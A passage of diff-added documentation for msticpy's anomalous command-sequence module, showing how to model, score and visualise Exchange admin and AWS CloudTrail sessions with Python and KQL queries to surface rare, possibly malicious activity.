+There is also the option to specify the ``modellable_params`` argument if
+you do not wish for rough heuristics to be used to determine which
+parameters take categorical values and are hence suitable for modelling.
+For example, if you wish to experiment with modelling the values of all the
+parameters (categorical + arbitrary strings), then you can use this
+argument to do so.
+
+Here are some details about the methods available for the Model class:
+
+::
+
+    Help on class Model in module msticpy.analysis.anomalous_sequence.model:
+
+    class Model(builtins.object)
+     |  Model(sessions: List[List[Union[str, msticpy.analysis.anomalous_sequence.utils.data_structures.Cmd]]], modellable_params: set = None)
+     |  Class for modelling sessions data.
+     |
+     |  Methods defined here:
+     |
+     |  __init__(self, sessions: List[List[Union[str, msticpy.analysis.anomalous_sequence.utils.data_structures.Cmd]]], modellable_params: set = None)
+     |      Instantiate the Model class.
+     |
+     |      This Model class can be used to model sessions, where each
+     |      session is a sequence of commands. We use a sliding window
+     |      approach to calculate the rarest part of each session. We
+     |      can view the sessions in ascending order of this metric to
+     |      see if the top sessions are anomalous/malicious.
+     |
+     |      Parameters
+     |      ----------
+     |      sessions: List[List[Union[str, Cmd]]]
+     |          list of sessions, where each session is a list of either
+     |          strings or a list of the Cmd datatype.
+     |
+     |          The Cmd datatype should have "name" and "params" as attributes
+     |          where "name" is the name of the command (string) and "params"
+     |          is either a set of accompanying params or a dict of
+     |          accompanying params and values.
+     |
+     |          examples formats of a session:
+     |              1) ['Set-User', 'Set-Mailbox']
+     |              2) [Cmd(name='Set-User', params={'Identity', 'Force'}),
+     |                  Cmd(name='Set-Mailbox', params={'Identity', 'AuditEnabled'})]
+     |              3) [Cmd(
+     |                      name='Set-User',
+     |                      params={'Identity': 'blahblah', 'Force': 'true'}
+     |                  ),
+     |                  Cmd(name='Set-Mailbox',
+     |                  params={'Identity': 'blahblah', 'AuditEnabled': 'false'})]
+     |      modellable_params: set, optional
+     |          set of params which you deem to have categorical values which are suitable
+     |          for modelling.
+     |          Note this argument will only have an effect if your sessions include commands,
+     |          params and values. If your sessions include commands, params and values and
+     |          this argument is not set, then some rough heuristics will be used to determine
+     |          which params have values which are suitable for modelling.
+     |
+     |  compute_geomean_lik_of_sessions(self)
+     |      Compute the geometric mean of the likelihood for each of the sessions.
+     |
+     |      This is done by raising the likelihood of the session to the power of
+     |      (1 / k) where k is the length of the session.
+     |
+     |      Note: If the lengths (number of commands) of the sessions vary a lot,
+     |      then you may not be able to fairly compare the likelihoods between a
+     |      long session and a short session. This is because longer sessions
+     |      involve multiplying more numbers together which are between 0 and 1.
+     |      Therefore the length of the session will be negatively correlated with
+     |      the likelihoods. If you take the geometric mean of the likelihood, then
+     |      you can compare the likelihoods more fairly across different session
+     |      lengths.
+     |
+     |  compute_likelihoods_of_sessions(self, use_start_end_tokens: bool = True)
+     |      Compute the likelihoods for each of the sessions.
+     |
+     |      Note: If the lengths (number of commands) of the sessions vary a lot,
+     |      then you may not be able to fairly compare the likelihoods between a
+     |      long session and a short session. This is because longer sessions
+     |      involve multiplying more numbers together which are between 0 and 1.
+     |      Therefore the length of the session will be negatively correlated with
+     |      the likelihoods. If you take the geometric mean of the likelihood, then
+     |      you can compare the likelihoods more fairly across different session
+     |      lengths
+     |
+     |      Parameters
+     |      ----------
+     |      use_start_end_tokens: bool
+     |          if True, then `start_token` and `end_token` will be prepended
+     |          and appended to the session respectively before the calculations
+     |          are done
+     |
+     |  compute_rarest_windows(self, window_len: int, use_start_end_tokens: bool = True, use_geo_mean: bool = False)
+     |      Find the rarest window and corresponding likelihood for each session.
+     |
+     |      In particular, uses a sliding window approach to find the rarest window
+     |      and corresponding likelihood for that window for each session.
+     |
+     |      If we have a long session filled with benign activity except for a small
+     |      window of suspicious behaviour, then this approach should be able to
+     |      identity the session as anomalous. This approach should be more
+     |      effective than simply taking the geometric mean of the full session
+     |      likelihood. This is because the small window of suspicious behaviour
+     |      might get averaged out by the majority benign behaviour in the session
+     |      when using the geometric mean approach.
+     |
+     |      Note that if we have a session of length k, and we use a sliding window
+     |      of length k+1, then we will end up with np.nan for the rarest window
+     |      likelihood metric for that session. However, if `use_start_end_tokens`
+     |      is set to True, then because we will be appending self.end_token to the
+     |      session, the session will be treated as a session of length k+1,
+     |      therefore, we will end up with a non np.nan value.
+     |
+     |      Parameters
+     |      ----------
+     |      window_len: int
+     |          length of sliding window for likelihood calculations
+     |      use_start_end_tokens: bool
+     |          if True, then `start_token` and `end_token` will be prepended
+     |          and appended to each
+     |          session respectively before the calculations are done
+     |      use_geo_mean: bool
+     |          if True, then each of the likelihoods of the sliding windows
+     |          will be raised to the power
+     |          of (1/`window_len`)
+     |
+     |  compute_scores(self, use_start_end_tokens: bool)
+     |      Compute some likelihood based scores/metrics for each of the sessions.
+     |
+     |      In particular, computes the likelihoods and geometric mean of
+     |      the likelihoods for each of the sessions. Also, uses the sliding
+     |      window approach to compute the rarest window likelihoods for each
+     |      of the sessions. It does this for windows of length 2 and 3.
+     |
+     |      Note that if we have a session of length k, and we use a sliding
+     |      window of length k+1, then we will end up with np.nan for the
+     |      rarest window likelihood metric for that session.
+     |      However, if `use_start_end_tokens` is set to True, then
+     |      because we will be appending self.end_token to the session,
+     |      the session will be treated as a session of length k+1,
+     |      therefore, we will end up with a non np.nan value for that session.
+     |
+     |      Parameters
+     |      ----------
+     |      use_start_end_tokens: bool
+     |          if True, then self.start_token and self.end_token will be
+     |          prepended and appended to each
+     |          of the sessions respectively before the calculations are done.
+     |
+     |  compute_setof_params_cond_cmd(self, use_geo_mean: bool)
+     |      Compute likelihood of combinations of params conditional on the cmd.
+     |
+     |      In particular, go through each command from each session and
+     |      compute the probability of that set of params (and values if provided)
+     |      appearing conditional on the command.
+     |
+     |      This can help us to identify unlikely combinations of params
+     |      (and values if provided) for each distinct command.
+     |
+     |      Note, this method is only available if each session is a list
+     |       of the Cmd datatype. It will result in an Exception if you
+     |       try and use it when each session is a list of strings.
+     |
+     |      Parameters
+     |      ----------
+     |      use_geo_mean: bool
+     |          if True, then the probabilities will be raised to
+     |          the power of (1/K)
+     |          case1: we have only params:
+     |              Then K is the number of distinct params which appeared
+     |              for the given cmd across all the sessions.
+     |          case2: we have params and values:
+     |              Then K is the number of distinct params which appeared
+     |              for the given cmd across all the sessions + the number
+     |              of values which we included in the modelling for this cmd.
+     |
+     |  train(self)
+     |      Train the model by computing counts and probabilities.
+     |
+     |      In particular, computes the counts and probabilities of the commands
+     |      (and possibly the params if provided, and possibly the values if provided)
+     |
+
+.. code:: ipython3
+
+   model = Model(sessions=sessions_df.Operation_list.values.tolist())
+   model.train()
+   model.compute_rarest_windows(window_len=2)
+   model.rare_window_likelihoods[2][:5]
+
+
+
+
+
+.. parsed-literal::
+
+    [0.06277653078978894,
+     0.06277653078978894,
+     0.06277653078978894,
+     0.06277653078978894,
+     0.06277653078978894]
+
+
+Visualise the Modelled Sessions
+-------------------------------
+
+Use the visualise\_scored\_sessions function
+^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
+
+Now we demonstrate the visualization component of the library.
+
+We do this using the ``visualise_scored_sessions`` function. This
+function returns an interactive timeline plot which allows you to zoom
+into different sections etc.
+
+-  The time of the session will be on the x-axis.
+-  The computed likelihood metric will be on the y-axis.
+-  lower likelihoods correspond to rarer sessions.
+
+.. important::
+   During the scoring/modelling stage, if you set the window length to be
+   k, then only sessions which have at least k-1 commands will appear in
+   the interactive timeline plot. This is because sessions with fewer than
+   k-1 commands will have a score of np.nan. The reason for the -1 is
+   because we append an end token to each session by default, so a session
+   of length k-1 gets treated as length k during the scoring.
+
+Here are some details about the arguments for the
+visualise\_scored\_sessions function:
+
+::
+
+    Help on function visualise_scored_sessions in module msticpy.analysis.anomalous_sequence.anomalous:
+
+    visualise_scored_sessions(data_with_scores: pandas.core.frame.DataFrame,
+                              time_column: str,
+                              score_column: str, window_column: str,
+                              score_upper_bound: float = None,
+                              source_columns: list = None)
+
+        Visualise the scored sessions on an interactive timeline.
+
+        Parameters
+        ----------
+        data_with_scores: pd.DataFrame
+            Dataframe which contains at least columns for time,
+            session score, window representing the session
+        time_column: str
+            name of the column which contains a timestamp
+        score_column: str
+            name of the column which contains a numerical score for each
+            of the sessions
+        window_column: str
+            name of the column which contains a representation of each of the sessions.
+            This representation will appear in the tooltips in the figure.
+            For example, it could be the rarest window of the session,
+            or the full session etc.
+        score_upper_bound: float, optional
+            an optional upper bound on the score for the visualisation figure.
+            This can help to zoom in on the more anomalous sessions
+        source_columns: list, optional
+            an optional list of source columns to include in the tooltips
+            in the visualisation.
+            Note, the content of each of these columns should be json serializable
+            in order to be compatible with the figure
+
+        Returns
+        -------
+        figure
+
+Visualise the scored sessions in an interactive timeline plot.
+
+.. code:: ipython3
+
+    anomalous.visualise_scored_sessions(
+        data_with_scores=modelled_df,
+        time_column='TimeGenerated_min',  # this will appear in the x-axis
+        score_column='rarest_window3_likelihood',  # this will appear on the y-axis
+        window_column='rarest_window3',  # this will represent the session in the tool-tips
+        source_columns=['UserId', 'ClientIP']  # specify any additonal columns to appear in the tool-tips
+    )
+
+
+.. figure:: _static/exchange.png
+   :alt: Timeline figure for Office Exchange sessions
+
+
+
+Use the score\_and\_visualise\_sessions function
+^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
+
+Now we demonstrate how you can score and visualise your sessions in one go.
+
+
+We will do this for the "Commands only" session type.
+
+But depending on which column you chose as the event\_col in the
+`sessionize\_data function <#use-the-sessionize-data-function>`_, you could set the
+"session\_column" parameter in the "score\_and\_visualise\_sessions"
+function below to any of the following:
+
+1. Operation\_list
+2. cmd\_param\_list
+3. cmd\_param\_val\_list
+
+Here are some details about the arguments for the
+``score_and_visualise_sessions`` function:
+
+::
+
+    Help on function score_and_visualise_sessions in module msticpy.analysis.anomalous_sequence.anomalous:
+
+    score_and_visualise_sessions(data: pandas.core.frame.DataFrame, session_column: str, window_length: int, time_column: str, likelihood_upper_bound: float = None, source_columns: list = None)
+
+        Model sessions and then produce an interactive timeline visualisation plot.
+
+        In particular, the sessions are modelled using a sliding window approach
+        within a markov model. The visualisation plot has time on the x-axis and
+        the modelled session likelihood metric on the y-axis.
+
+        Parameters
+        ----------
+        data: pd.DataFrame
+            Dataframe which contains at least columns for time and sessions
+        session_column: str
+            name of the column which contains the sessions
+            The values in the session column should take one of the following formats:
+                examples formats of a session:
+                1) ['Set-User', 'Set-Mailbox']
+                2) [Cmd(name='Set-User', params={'Identity', 'Force'}),
+                    Cmd(name='Set-Mailbox', params={'Identity', 'AuditEnabled'})]
+                3) [Cmd(
+                        name='Set-User',
+                        params={'Identity': 'blahblah', 'Force': 'true'}
+                    ),
+                    Cmd(
+                        name='Set-Mailbox',
+                        params={'Identity': 'blahblah', 'AuditEnabled': 'false'}
+                    )]
+            The Cmd datatype can be accessed from
+            seqeunce.utils.data_structures.Cmd
+        window_length: int
+            length of the sliding window to use when computing the
+            likelihood metrics for each session.
+
+            This should be set to an integer >= 2.
+            Note that sessions which have fewer commands than the chosen
+            window_length + 1 will not appear in the visualisation. (The + 1 is
+            because we append a dummy `end_token` to each session before starting
+            the sliding window, so a session of length 2, would be treated as length
+            3)
+        time_column: str
+            name of the column which contains a timestamp
+        likelihood_upper_bound: float, optional
+            an optional upper bound on the likelihood metrics for the visualisation
+            plot. This can help to zoom in on the more anomalous sessions
+        source_columns: list, optional
+            An optional list of source columns to include in the tooltips
+            in the visualisation.
+            Note, the content of each of these columns should be json
+            serializable in order to be compatible with the figure
+
+        Returns
+        -------
+        figure
+
+Let's model and visualise these sessions in one go
+
+.. code:: ipython3
+
+    anomalous.score_and_visualise_sessions(
+        data=sessions_df,
+        session_column='Operation_list',
+        window_length=3,
+        time_column='TimeGenerated_min',
+        source_columns=['UserId', 'ClientIP']
+    )
+
+
+.. figure:: _static/exchange.png
+   :alt: Timeline figure for Office Exchange sessions
+
+
+Other Log Types + KQL
+---------------------
+
+The aim of this section is to provide some starter guidance on how one
+might start to sessionize + model some other types of logs. We
+demonstrate how to use KQL to sessionize directly.
+
+In order to do the sessionizing using KQL, we use the
+`row\_window\_session <https://docs.microsoft.com/azure/data-explorer/kusto/query/row-window-session-function>`__
+function.
+
+.. important:: Throughout this section, the decisions made about which
+   columns should be interpreted as commands/events and parameters are
+   meant to be illustrative; alternative approaches may also be valid.
+
+Using LogAnalytics Query Provider
+^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
+
+msticpy has a QueryProvider class which you can use to connect to your
+Log Analytics data environment.
+
+.. code:: ipython3
+
+    # Try to read workspace configuration from msticpyconfig.yaml, and then authenticate
+    try:
+        ws_config = WorkspaceConfig(workspace='Default')
+        qry_prov = QueryProvider(data_environment="LogAnalytics")
+        qry_prov.connect(connection_str=ws_config.code_connect_str)
+    except:
+        print('There is an issue with reading in the config file. Please fill in the following manually.')
+        tenant_id = input("Please enter your Log Analytics tenant id:")
+        workspace_id = input("Please enter your Log Analytics workspace id:")
+        la_connection_string = 'loganalytics://code().tenant("{}").workspace("{}")'.format(tenant_id, workspace_id)
+        qry_prov = QueryProvider(data_environment="LogAnalytics")
+        qry_prov.connect(connection_str=la_connection_string)
+
+
+Office Activity Logs
+^^^^^^^^^^^^^^^^^^^^
+
+The cell below contains a kusto query which queries the OfficeActivity
+table in Log Analytics. In this example, we wish for the sessions to be
+on a per UserId - ClientIP basis. In addition, we require that each
+session be no longer than 20 minutes in total, with each command no more
+than 2 minutes apart from each other. (These requirements can be
+adjusted for different data-sets/use-cases etc).
+
+Here are some high level steps to the query:
+
+-  Add a time filter which goes back far enough so you have enough data
+   to train the model.
+-  Filter to the desired type of logs.
+-  Exclude some known automated users (optional)
+-  Sort the rows by UserId, ClientIp, TimeGenerated in ascending order
+-  Use the native KQL function row\_window\_session to create an
+   additional "begin" column to aid creating the sessions
+-  Summarize the commands (and optionally parameters) by UserId,
+   ClientIp, begin
+-  Optionally exclude sessions which have only 1 command
+
+Note that in KQL, comments are made using //
+
+.. code:: ipython3
+
+    # write kql query
+    query = """
+    let time_back = 60d;
+    OfficeActivity
+    | where TimeGenerated >= ago(time_back)
+    //
+    // filter to the event type of interest
+    | where RecordType == 'ExchangeAdmin'
+    //
+    // exclude some known automated users
+    | where UserId !startswith "NT AUTHORITY" and UserId !contains "prod.outlook.com"
+    //
+    // create new dynamic variable with the command as the key, and the parameters as the values
+    | extend params = todynamic(strcat('{"', Operation, '" : ', tostring(Parameters), '}'))
+    | project TimeGenerated, UserId, ClientIP, Operation, params
+    //
+    // sort by the user related columns and the timestamp column in ascending order
+    | sort by UserId asc, ClientIP asc, TimeGenerated asc
+    //
+    // calculate the start time of each session into the "begin" variable
+    // With each session max 20 mins in length with each event at most 2 mins apart.
+    // A new session is created each time one of the user related columns change.
+    | extend begin = row_window_session(TimeGenerated, 20m, 2m, UserId != prev(UserId) or ClientIP != prev(ClientIP))
+    //
+    // summarize the operations and the params by the user related variables and the "begin" variable
+    | summarize cmds=makelist(Operation), end=max(TimeGenerated), nCmds=count(), nDistinctCmds=dcount(Operation),
+    params=makelist(params) by UserId, ClientIP, begin
+    //
+    //optionally specify an order to the final columns
+    | project UserId, ClientIP, nCmds, nDistinctCmds, begin, end, duration=end-begin, cmds, params
+    //
+    // optionally filter out sessions which contain only one event
+    //| where nCmds > 1
+    """
+
+.. code:: ipython3
+
+    # execute the query
+    exchange_df = qry_prov.exec_query(query=query)
+    # I comment out this cell and run it again once it has run to prevent the notebook from slowing down
+
+.. code:: ipython3
+
+    try:
+        print(exchange_df.shape)
+    except AttributeError as e:
+        exchange_df = _kql_raw_result_.to_dataframe()
+        print(exchange_df.shape)
+
+
+.. parsed-literal::
+
+    (252, 9)
+
+
+.. code:: ipython3
+
+    exchange_df.head()
+
+
+.. raw:: html
+
+    <div style="overflow: scroll;">
+    <style scoped>
+        .dataframe tbody tr th:only-of-type {
+            vertical-align: middle;
+        }
+
+        .dataframe tbody tr th {
+            vertical-align: top;
+        }
+
+        .dataframe thead th {
+            text-align: right;
+        }
+    </style>
+    <table border="1" class="dataframe">
+      <thead>
+        <tr style="text-align: right;">
+          <th></th>
+          <th>UserId</th>
+          <th>ClientIP</th>
+          <th>nCmds</th>
+          <th>nDistinctCmds</th>
+          <th>begin</th>
+          <th>end</th>
+          <th>duration</th>
+          <th>cmds</th>
+          <th>params</th>
+        </tr>
+      </thead>
+      <tbody>
+        <tr>
+          <th>0</th>
+          <td></td>
+          <td></td>
+          <td>2</td>
+          <td>2</td>
+          <td>2020-03-31 02:19:26+00:00</td>
+          <td>2020-03-31 02:19:28+00:00</td>
+          <td>00:00:02</td>
+          <td>[Remove-MailboxLocation, Set-User]</td>
+          <td>[{'Remove-MailboxLocation': [{'Name': 'Identity', 'Value': '4b2462a4-bbee-495a-a0e1-f23ae524cc9c...</td>
+        </tr>
+        <tr>
+          <th>1</th>
+          <td></td>
+          <td></td>
+          <td>1</td>
+          <td>1</td>
+          <td>2020-03-31 22:02:51+00:00</td>
+          <td>2020-03-31 22:02:51+00:00</td>
+          <td>00:00:00</td>
+          <td>[Set-User]</td>
+          <td>[{'Set-User': [{'Name': 'Identity', 'Value': '4b2462a4-bbee-495a-a0e1-f23ae524cc9c\\a2409f54-2a3...</td>
+        </tr>
+        <tr>
+          <th>2</th>
+          <td></td>
+          <td></td>
+          <td>2</td>
+          <td>2</td>
+          <td>2020-04-01 20:12:19+00:00</td>
+          <td>2020-04-01 20:12:55+00:00</td>
+          <td>00:00:36</td>
+          <td>[Remove-MailboxLocation, Set-User]</td>
+          <td>[{'Remove-MailboxLocation': [{'Name': 'Identity', 'Value': '4b2462a4-bbee-495a-a0e1-f23ae524cc9c...</td>
+        </tr>
+        <tr>
+          <th>3</th>
+          <td></td>
+          <td></td>
+          <td>3</td>
+          <td>2</td>
+          <td>2020-04-02 09:01:22+00:00</td>
+          <td>2020-04-02 09:01:38+00:00</td>
+          <td>00:00:16</td>
+          <td>[Remove-MailboxLocation, Remove-MailboxLocation, Set-User]</td>
+          <td>[{'Remove-MailboxLocation': [{'Name': 'Identity', 'Value': '4b2462a4-bbee-495a-a0e1-f23ae524cc9c...</td>
+        </tr>
+        <tr>
+          <th>4</th>
+          <td></td>
+          <td></td>
+          <td>1</td>
+          <td>1</td>
+          <td>2020-04-02 13:49:42+00:00</td>
+          <td>2020-04-02 13:49:42+00:00</td>
+          <td>00:00:00</td>
+          <td>[Set-ConditionalAccessPolicy]</td>
+          <td>[{'Set-ConditionalAccessPolicy': [{'Name': 'Identity', 'Value': 'seccxpninja.onmicrosoft.com\\64...</td>
+        </tr>
+      </tbody>
+    </table>
+    </div>
+
+
+
+Convert Exchange Sessions to Correct Format for the Model
+~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+
+Recall the allowed session types `here <#what-is-a-session>`__
+
+So let's see what needs to be done to the exchange\_df
+
+-  The "cmds" column is already in a suitable format of type (1). This
+   is because it is a list of strings.
+-  If we wish to also include the parameters (and optionally the
+   corresponding values) to the model, then we need to transform the
+   "params" column slightly
+
+.. code:: ipython3
+
+    # define a helper function for converting the sessions with params (and values) into a suitable format
+
+    def process_exchange_session(session_with_params: [List[Dict[str, List[Dict[str, str]]]]], include_vals: bool) -> List[Cmd]:
+        """
+        Converts an exchange session with params to an allowed format.
+
+        Parameters
+        ----------
+        param session_with_params : list
+            example format:
+            [
+                {'Set-Mailbox': [{'Name': 'MessageCopyForSentAsEnabled', 'Value': 'True'},
+                {'Name': 'Identity', 'Value': 'blahblah@blah.com'}]}
+            ]
+        include_vals : bool
+            if True, then it will be transformed to a format which includes the values,
+            else the output will just contain the parameters
+
+        Returns
+        -------
+        list :
+            list of the Cmd data type which includes either just the parameters,
+            or also the corresponding values
+        """
+        new_ses = []
+        for cmd in session_with_params:
+            c = list(cmd.keys())[0]
+            par = list(cmd.values())[0]
+            new_pars = set()
+            if include_vals:
+                new_pars = dict()
+            for p in par:
+                if include_vals:
+                    new_pars[p['Name']] = p['Value']
+                else:
+                    new_pars.add(p['Name'])
+            new_ses.append(Cmd(name=c, params=new_pars))
+        return new_ses
+
+Let's create suitable sessions for params, and suitable sessions for params + values
+
+.. code:: ipython3
+
+    sessions = exchange_df.cmds.values.tolist()
+    param_sessions = []
+    param_value_sessions = []
+
+    for ses in exchange_df.params.values.tolist():
+        new_ses_set = process_exchange_session(session_with_params=ses, include_vals=False)
+        new_ses_dict = process_exchange_session(session_with_params=ses, include_vals=True)
+        param_sessions.append(new_ses_set)
+        param_value_sessions.append(new_ses_dict)
+
+Let's see the differences between the three types of sessions.
+
+.. code:: ipython3
+
+    ind = 0
+
+    print(sessions[ind][:3])
+    print(param_sessions[ind][:3])
+    print(param_value_sessions[ind][:3])
+
+
+.. parsed-literal::
+
+    ['Remove-MailboxLocation', 'Set-User']
+    [Cmd(name='Remove-MailboxLocation', params={'ErrorAction', 'Identity', 'Confirm'}), Cmd(name='Set-User', params={'ErrorAction', 'Identity', 'SyncMailboxLocationGuids'})]
+    [Cmd(name='Remove-MailboxLocation', params={'Identity': '4b2462a4-bbee-495a-a0e1-f23ae524cc9c\\b81afc79-520a-4143-bbc4-b8cadc11d007', 'Confirm': 'False', 'ErrorAction': 'Stop'}), Cmd(name='Set-User', params={'Identity': '4b2462a4-bbee-495a-a0e1-f23ae524cc9c\\a2409f54-2a30-4647-ba61-3cb44edc1a5a', 'SyncMailboxLocationGuids': 'True', 'ErrorAction': 'Stop'})]
+
+
+.. code:: ipython3
+
+    # let's add these reformatted sessions as columns to a dataframe
+    data = exchange_df
+    data['session'] = sessions
+    data['param_session'] = param_sessions
+    data['param_value_session'] = param_value_sessions
+
+Now we will model and visualise these sessions in one go using the
+``score_and_visualise_sessions`` function.
+
+Since we created columns for all 3 session types, the session\_column
+argument can be set to any of the following:
+
+-  session
+-  param\_session
+-  param\_value\_session
+
+.. code:: ipython3
+
+    # let's model and visualise these sessions in one go
+
+    anomalous.score_and_visualise_sessions(
+        data=data,
+        session_column='param_session',
+        window_length=3,
+        time_column='begin',
+        source_columns=['UserId', 'ClientIP']
+    )
+
+.. figure:: _static/exchange1.png
+   :alt: Timeline figure for Office Exchange sessions
+
+
+
+AWS Cloud Trail Logs
+^^^^^^^^^^^^^^^^^^^^
+
+The cell below contains a kusto query which queries the AWSCloudTrail
+table in Log Analytics. In this example, we wish for the sessions to be
+on a per UserId - ClientIP - UserAgent - role basis. In addition, we
+require that each session be no longer than 20 minutes in total, with
+each command no more than 2 minutes apart from each other. (These
+requirements can be adjusted for different data-sets/use-cases etc).
+
+Note we choose a much shorter time\_back in this KQL query. This is just
+because the AWS Cloud Trail logs have a lot more data when compared with
+the exchange admin logs for this demo tenant. We therefore choose a
+shorter time back purely to prevent this demo notebook from slowing
+down.
+
+.. code:: ipython3
+
+    query = """
+    let time_back = 1d;
+    AWSCloudTrail
+    | where TimeGenerated >= ago(time_back)
+    //
+    // filter to the event type of interest
+    | where EventTypeName == 'AwsApiCall'
+    //
+    // optionally exclude some rows which are not suitable for your use case
+    | where UserIdentityPrincipalid != '' and SessionIssuerUserName != ''
+    //
+    // create dynamic param variable which has the EventName as the key and the RequestParameters as the values
+    | extend par = iff(RequestParameters == '', '{}', RequestParameters)
+    | extend param = todynamic(strcat('{"', EventName, '": ', tostring(par), '}'))
+    //
+    // rename some columns
+    | project TimeGenerated, Operation=EventName, UserId=UserIdentityPrincipalid, ClientIP=SourceIpAddress, UserAgent, role=SessionIssuerUserName, param
+    //
+    // sort by the user related columns and the timestamp column in ascending order
+    | order by UserId asc, ClientIP asc, UserAgent asc, role asc, TimeGenerated asc
+    //
+    // calculate the start time of each session into the "begin" variable
+    // With each session max 20 mins in length with each event at most 2 mins apart.
+    // A new session is created each time one of the user related columns change.
+    | extend begin = row_window_session(TimeGenerated, 20m, 2m, UserId != prev(UserId) or ClientIP != prev(ClientIP) or UserAgent != prev(UserAgent) or role != prev(role))
+    //
+    // summarize the operations and the params by the user related variables and the "begin" variable
+    | summarize cmds=makelist(Operation), end=max(TimeGenerated), nCmds=count(), nDistinctCmds=dcount(Operation), UserAgent=any(UserAgent), role=any(role), params=makelist(param) by UserId, ClientIP, begin
+    //
+    // optionally specify an order to the final columns
+    | project UserId, ClientIP, nCmds, nDistinctCmds, begin, end, duration=end-begin, role, UserAgent, cmds, params
+    //
+    //optionally filter out sessions which contain only one event
+    | where nCmds > 1
+    """
+
+Execute the query
+
+.. code:: ipython3
+
+
+    aws_df = qry_prov.exec_query(query=query)
+    # I comment out this cell and run it again once it has run to prevent the
+    # notebook from slowing down
+
+.. code:: ipython3
+
+    try:
+        print(aws_df.shape)
+    except AttributeError as e:
+        aws_df = _kql_raw_result_.to_dataframe()
+        print(aws_df.shape)
+
+
+.. parsed-literal::
+
+    (2689, 11)
+
+
+.. code:: ipython3
+
+    aws_df.head()
+
+
+
+
+.. raw:: html
+
+    <div style="overflow: scroll;">
+    <style scoped>
+        .dataframe tbody tr th:only-of-type {
+            vertical-align: middle;
+        }
+
+        .dataframe tbody tr th {
+            vertical-align: top;
+        }
+
+        .dataframe thead th {
+            text-align: right;
+        }
+    </style>
+    <table border="1" class="dataframe">
+      <thead>
+        <tr style="text-align: right;">
+          <th></th>
+          <th>UserId</th>
+          <th>ClientIP</th>
+          <th>nCmds</th>
+          <th>nDistinctCmds</th>
+          <th>begin</th>
+          <th>end</th>
+          <th>duration</th>
+          <th>role</th>
+          <th>UserAgent</th>
+          <th>cmds</th>
+          <th>params</th>
+        </tr>
+      </thead>
+      <tbody>
+        <tr>
+          <th>0</th>
+          <td>AROA3WIKNJYL5IERDHCJX:0e1059bf-bb62-449c-bca4-90871edc48b1</td>
+          <td>13.68.133.167</td>
+          <td>15</td>
+          <td>1</td>
+          <td>2020-05-28 04:18:17+00:00</td>
+          <td>2020-05-28 04:18:18+00:00</td>
+          <td>00:00:01</td>
+          <td>Ashwin-AzSentinel</td>
+          <td>aws-sdk-dotnet-45/3.3.100.7 aws-sdk-dotnet-core/3.3.100.7 .NET_Runtime/4.0 .NET_Framework/4.0 OS...</td>
+          <td>[LookupEvents, LookupEvents, LookupEvents, LookupEvents, LookupEvents, LookupEvents, LookupEvent...</td>
+          <td>[{'LookupEvents': {'startTime': 'May 28, 2020 3:57:26 AM', 'endTime': 'May 28, 2020 4:02:26 AM'}...</td>
+        </tr>
+        <tr>
+          <th>1</th>
+          <td>AROA3WIKNJYL5IERDHCJX:0e1059bf-bb62-449c-bca4-90871edc48b1</td>
+          <td>13.68.133.167</td>
+          <td>14</td>
+          <td>1</td>
+          <td>2020-05-28 04:23:23+00:00</td>
+          <td>2020-05-28 04:23:23+00:00</td>
+          <td>00:00:00</td>
+          <td>Ashwin-AzSentinel</td>
+          <td>aws-sdk-dotnet-45/3.3.100.7 aws-sdk-dotnet-core/3.3.100.7 .NET_Runtime/4.0 .NET_Framework/4.0 OS...</td>
+          <td>[LookupEvents, LookupEvents, LookupEvents, LookupEvents, LookupEvents, LookupEvents, LookupEvent...</td>
+          <td>[{'LookupEvents': {'startTime': 'May 28, 2020 4:02:26 AM', 'endTime': 'May 28, 2020 4:07:26 AM'}...</td>
+        </tr>
+        <tr>
+          <th>2</th>
+          <td>AROA3WIKNJYL5IERDHCJX:0e1059bf-bb62-449c-bca4-90871edc48b1</td>
+          <td>40.87.53.92</td>
+          <td>14</td>
+          <td>1</td>
+          <td>2020-05-28 04:13:08+00:00</td>
+          <td>2020-05-28 04:13:09+00:00</td>
+          <td>00:00:01</td>
+          <td>Ashwin-AzSentinel</td>
+          <td>aws-sdk-dotnet-45/3.3.100.7 aws-sdk-dotnet-core/3.3.100.7 .NET_Runtime/4.0 .NET_Framework/4.0 OS...</td>
+          <td>[LookupEvents, LookupEvents, LookupEvents, LookupEvents, LookupEvents, LookupEvents, LookupEvent...</td>
+          <td>[{'LookupEvents': {'startTime': 'May 28, 2020 3:52:26 AM', 'endTime': 'May 28, 2020 3:57:26 AM'}...</td>
+        </tr>
+        <tr>
+          <th>3</th>
+          <td>AROA3WIKNJYL5IERDHCJX:0e1059bf-bb62-449c-bca4-90871edc48b1</td>
+          <td>40.87.53.92</td>
+          <td>16</td>
+          <td>1</td>
+          <td>2020-05-28 04:42:30+00:00</td>
+          <td>2020-05-28 04:42:30+00:00</td>
+          <td>00:00:00</td>
+          <td>Ashwin-AzSentinel</td>
+          <td>aws-sdk-dotnet-45/3.3.100.7 aws-sdk-dotnet-core/3.3.100.7 .NET_Runtime/4.0 .NET_Framework/4.0 OS...</td>
+          <td>[LookupEvents, LookupEvents, LookupEvents, LookupEvents, LookupEvents, LookupEvents, LookupEvent...</td>
+          <td>[{'LookupEvents': {'startTime': 'May 28, 2020 4:22:26 AM', 'endTime': 'May 28, 2020 4:27:26 AM'}...</td>
+        </tr>
+        <tr>
+          <th>4</th>
+          <td>AROA3WIKNJYL5IERDHCJX:0e1059bf-bb62-449c-bca4-90871edc48b1</td>
+          <td>52.170.0.208</td>
+          <td>16</td>
+          <td>1</td>
+          <td>2020-05-28 04:02:45+00:00</td>
+          <td>2020-05-28 04:02:45+00:00</td>
+          <td>00:00:00</td>
+          <td>Ashwin-AzSentinel</td>
+          <td>aws-sdk-dotnet-45/3.3.100.7 aws-sdk-dotnet-core/3.3.100.7 .NET_Runtime/4.0 .NET_Framework/4.0 OS...</td>
+          <td>[LookupEvents, LookupEvents, LookupEvents, LookupEvents, LookupEvents, LookupEvents, LookupEvent...</td>
+          <td>[{'LookupEvents': {'startTime': 'May 28, 2020 3:42:26 AM', 'endTime': 'May 28, 2020 3:47:26 AM'}...</td>
+        </tr>
+      </tbody>
+    </table>
+    </div>
+
+
+
+Convert AWS sessions to the correct format for the model
+~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
